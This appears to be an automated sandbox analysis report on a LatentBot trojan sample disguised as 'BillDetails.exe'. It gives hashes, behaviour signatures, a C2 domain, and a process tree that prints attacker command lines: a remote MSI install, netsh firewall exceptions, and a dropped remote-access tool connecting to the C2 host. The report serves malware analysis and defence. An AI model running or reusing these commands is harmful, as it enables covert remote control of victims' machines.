Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-10-2024 19:23

General

  • Target

    BillDetails.exe

  • Size

    3.9MB

  • MD5

    f9fdaa73953ce9a148bc4b465ab1408f

  • SHA1

    a2f259b8f8ddfae8994eb8200b8d89c256ddc13d

  • SHA256

    0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38

  • SHA512

    889440392c11a0de283d6bf32ec4ba2c3e9aca463b7f96562815e1c2e06b1fe1f0a719896bfbb158ca7c1d557120fa73c82576f987ac76b28a0b8e598c111466

  • SSDEEP

    98304:6tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqtxLA:6tSb9+zykLmxd/cHwOkp7uA

Malware Config

Extracted

Family

latentbot

C2

besthard2024.zapto.org

Signatures

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 10 IoCs
  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BillDetails.exe
    "C:\Users\Admin\AppData\Local\Temp\BillDetails.exe"
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\BillDetails.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728242400 "
      2⤵
      • Use of msiexec (install) with remote resource
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:2164
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:692
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIE9C8F.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2584
      • C:\Windows\SysWOW64\attrib.exe
        C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2084
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2024
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" cls"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2368
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:808
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding DCC0A7B1C2009FA3A55724565ED974D7 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2044
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding DB3CA0AD81961781C9F2F4DD51C1ADC6
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1968
    • C:\Windows\Installer\MSIBA72.tmp
      "C:\Windows\Installer\MSIBA72.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1620
  • C:\Games\PrintDrivers.exe
    "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    PID:1772
  • C:\Windows\system32\cmd.exe
    cmd /c ""C:\Games\PrintDrivers.cmd" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\system32\mode.com
      Mode 90,20
      2⤵
        PID:1752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
        2⤵
          PID:2152
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1780
          • C:\Windows\system32\reg.exe
            Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
            3⤵
              PID:988
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where (name="PrintDriver.exe") get commandline
            2⤵
              PID:2512
            • C:\Windows\system32\findstr.exe
              findstr /i "PrintDriver.exe"
              2⤵
                PID:1756
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
                2⤵
                  PID:2684
                • C:\Windows\system32\cmd.exe
                  cmd
                  2⤵
                  • Loads dropped DLL
                  PID:2732
                  • C:\Windows\system32\mode.com
                    Mode 90,20
                    3⤵
                      PID:2904
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2468
                    • C:\Windows\system32\netsh.exe
                      netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1616
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where (name="PrintDriver.exe") get commandline
                      3⤵
                        PID:2920
                      • C:\Windows\system32\findstr.exe
                        findstr /i "PrintDriver.exe"
                        3⤵
                          PID:2704
                        • C:\Games\PrintDriver.exe
                          C:\Games\PrintDriver.exe -autoreconnect ID:5700530 -connect besthard2024.zapto.org:5500 -run
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:2940
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:2708
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2984
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:1496
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:2004
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:2112
                      • C:\Windows\system32\taskkill.exe
                        taskkill /im rundll32.exe /f
                        2⤵
                        • Kills process with taskkill
                        PID:572
                      • C:\Games\PrintDrivers.exe
                        C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:1836
                    • C:\Windows\system32\cmd.exe
                      cmd /c ""C:\Games\driverhelp.cmd" "
                      1⤵
                        PID:1196
                        • C:\Windows\system32\mode.com
                          Mode 90,20
                          2⤵
                            PID:448
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
                            2⤵
                              PID:1140
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                              2⤵
                                PID:1480
                                • C:\Windows\system32\reg.exe
                                  Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
                                  3⤵
                                    PID:2432
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2252
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1008
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1676
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1340
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:1028
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:2544
                                • C:\Windows\system32\timeout.exe
                                  timeout /t 20
                                  2⤵
                                  • Delays execution with timeout.exe
                                  PID:372

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Config.Msi\f76b8d7.rbs

                                Filesize

                                422KB

                                MD5

                                cf58d33b19946b6e77fa7b8e27691dbe

                                SHA1

                                e86a59308de117261303b3d1c7eb39ec0b522f7f

                                SHA256

                                41263eb855132508adfde3540e11ece74e7aa7bff61fe4740740575734a676df

                                SHA512

                                b4dff6a9ea291bcbed8f1e1947c925ce584209fbf6315aae50451591aa816bdb1f901dd0f4259279bbc2594e28badae50a500e1a50b6ffc2d5d2fa79b3252caa

                              • C:\Games\PrintDriver.exe

                                Filesize

                                2.8MB

                                MD5

                                27c1c264c6fce4a5f44419f1783db8e0

                                SHA1

                                e071486e4dfef3a13f958a252d7000d3ce7bfd89

                                SHA256

                                29379afd1ca5439c82931d623fda335174dc416e5b013591457fa1f7bbe564db

                                SHA512

                                a80a512be6f152e8737cd5d0a0a2a193eaf88f3bfb7ed6b7695d227e195db278e2734ebfc9fe48a68cfb13e4e5bb7fb4825019cfa2210ba741ecf8b11f954a98

                              • C:\Games\PrintDriver.txt

                                Filesize

                                1KB

                                MD5

                                6eb13f7936a83f4c44842029914aad6e

                                SHA1

                                7b9b27731d4ca6f996ce68c5d68b4d653e31d915

                                SHA256

                                8d9bb49947d9dc7fa7be7310149a99f13a0c02580fd996aae31c69d673775c49

                                SHA512

                                227788193867b2f99a62ae792d91562ad46ea3fa0855cf6ef28fc0de31d43f2e671c6ef50e534f0235f1f663769715bef162913a554e86e581fe05455373623e

                              • C:\Games\PrintDrivers.cmd

                                Filesize

                                1KB

                                MD5

                                eacc690f71a77685f030bef23b506b91

                                SHA1

                                03b911ba997d44028bf515ea44fe4813b4b4a785

                                SHA256

                                0f1d30740f2e46b22b86fb01acdabbd02440d7dbebe963a405fb3a5661b23263

                                SHA512

                                9870aa4dc699b74bfc8fb53df0c74686913f42ea2321bee39786e5be696fb081e3dfdac1b312f3c439c14e3061f35cefe820ef1ac5c853274ca0c867bf50a54d

                              • C:\Games\PrintDrivers.exe

                                Filesize

                                403KB

                                MD5

                                29ed7d64ce8003c0139cccb04d9af7f0

                                SHA1

                                8172071a639681934d3dc77189eb88a04c8bcfac

                                SHA256

                                e48aac5148b261371c714b9e00268809832e4f82d23748e44f5cfbbf20ca3d3f

                                SHA512

                                4bdd4bf57eaf0c9914e483e160182db7f2581b0e2adc133885bf0f364123d849d247d3f077a58d930e80502a7f27f1457f7e2502d466aec80a4fbeebd0b59415

                              • C:\Games\UltraVNC.ini

                                Filesize

                                1KB

                                MD5

                                cb5b8a5789c15957c039ff3ce988c1a2

                                SHA1

                                4de9a626f04bc7c619fdb68e5585739855ded2d1

                                SHA256

                                a11a72865948a8d6a88df530108c3b8ba3e8b4ac6316ac22443af81fa1c3daf4

                                SHA512

                                68dd583237ea70702d76d9a2a607bbb8f2e2a1e4285de347b4e23faa0063b51f20f5a84cbe907ef4c123eba0add1c99cb4f9f1e13ddff97b34bb1e7c18825e32

                              • C:\Games\driverhelp.cmd

                                Filesize

                                870B

                                MD5

                                fd3b5847ddb8a31413951c0aa870ab95

                                SHA1

                                e3e91e3e9fa442cd1937422120de91da87973ddb

                                SHA256

                                e4f5e16dfe9bbe6d63f266103c35c0035a2d4014f516420190b7cfafb02b08ad

                                SHA512

                                5d8599f7d6f0824ab30118f5680bf89d28c1e7e9de4ed61af9074cb9d339619d59dab8e5818dc93dcf5b27ad9e8a863c5d082f8f829aa8c4a026ec5da2454096

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                Filesize

                                342B

                                MD5

                                538f1863a0374a58d22bdd8316861394

                                SHA1

                                83b8efc53691558b404f0b29530ad7390c1997f1

                                SHA256

                                20ecc008462677f0a416844c6d73021939f6e0d15eadbf0f083f6808fd0f241b

                                SHA512

                                b8c588a707b609b5f64234dda7d9aabcce66b477fee348372c286835892e88bf080e5ef74bd39d2d4bef5e93d83fba75ca8f1572364adcf2ca4bd21606ee90a7

                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                Filesize

                                342B

                                MD5

                                5ba57e4eef04aeedf51b98cb1cf537e4

                                SHA1

                                1064e5b918cd9dd823fd391022111a6105022330

                                SHA256

                                a5e0091df6e18fd4e202cec725369e21d3c60e056ca27dbd64384497789da857

                                SHA512

                                fe1f125391ef03b19e3624701bf18875d967f74c2df59e0374f7542d1e90df7688df5be2c26469a9622136b2d3f3d6f054319110a67095fd79d079282749f22c

                              • C:\Users\Admin\AppData\Local\Temp\AIE9C8F.tmp

                                Filesize

                                6.7MB

                                MD5

                                e21b2080c98beb0f04307a5a25630e23

                                SHA1

                                8fc24ad51e8d61324fe8de1be667862e9238cbbb

                                SHA256

                                0dbeaab616c483b81d9e9ed8dda14a3a8f3b024130f8fab840e7b9f3a7b1787e

                                SHA512

                                3706fde6569bccb39e2c58e86c60050c73bcdbe5c7eb05849ced33c75b5a1c3b080746c2e27420c6fffcd3497e1b1b6ab87e1b2d371a80fa3ae27851a64cfbea

                              • C:\Users\Admin\AppData\Local\Temp\CabA660.tmp

                                Filesize

                                70KB

                                MD5

                                49aebf8cbd62d92ac215b2923fb1b9f5

                                SHA1

                                1723be06719828dda65ad804298d0431f6aff976

                                SHA256

                                b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                SHA512

                                bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                              • C:\Users\Admin\AppData\Local\Temp\EXEBB15.bat

                                Filesize

                                369B

                                MD5

                                f8e37804235ab3f7af30adff9f720482

                                SHA1

                                fdde9873294850acb1c07ae31ab7786f6a7f6345

                                SHA256

                                15d53b21e7f1c986eae3fbe65fe2d488be0b80aa73c5d7cf88a8a9b1d3510ebb

                                SHA512

                                2bed3c302e2d1e6a61e76baf70c00914def1d8692b7dec3ec165e351d9e7610acb7827b3d2c1dfb9278305bd178c64eedace6491577fc492f7a22c6922e4c923

                              • C:\Users\Admin\AppData\Local\Temp\MSIA88E.tmp

                                Filesize

                                997KB

                                MD5

                                ec6ebf65fe4f361a73e473f46730e05c

                                SHA1

                                01f946dfbf773f977af5ade7c27fffc7fe311149

                                SHA256

                                d3614d7bece53e0d408e31da7d9b0ff2f7285a7dd544c778847ed0c5ded5d52f

                                SHA512

                                e4d7aafa75d07a3071d2739d18b4c2b0a3798f754b339c349db9a6004d031bf02f3970b030cec4a5f55b4c19f03794b0ce186a303d936c222e7e6e8726fffff7

                              • C:\Users\Admin\AppData\Local\Temp\TarA692.tmp

                                Filesize

                                181KB

                                MD5

                                4ea6026cf93ec6338144661bf1202cd1

                                SHA1

                                a1dec9044f750ad887935a01430bf49322fbdcb7

                                SHA256

                                8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                SHA512

                                6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                              • C:\Windows\Installer\MSIBA72.tmp

                                Filesize

                                418KB

                                MD5

                                432827ec55428786a447b3d848d963b7

                                SHA1

                                029901586604f3ab1b0bd18868469a96db0ef470

                                SHA256

                                5a4e76f840fe7d9872164c6c3ce85f4dd0405e661c04638e0b8a91157398bbf0

                                SHA512

                                efe03d3446b07180a12d8cd8d0b6d25dd6da5b445c6d61125b0e81c848a98b78f502a6c7c8c7dfc87b3d5beafdea100ac6580e0d28f2cfb99eda90a19449c226

                              • memory/560-235-0x00000000023C0000-0x00000000023D0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1620-170-0x0000000000120000-0x0000000000122000-memory.dmp

                                Filesize

                                8KB

                              • memory/1772-173-0x0000000000160000-0x0000000000162000-memory.dmp

                                Filesize

                                8KB

                              • memory/1836-250-0x0000000000320000-0x0000000000322000-memory.dmp

                                Filesize

                                8KB

                              • memory/2420-0-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                Filesize

                                4KB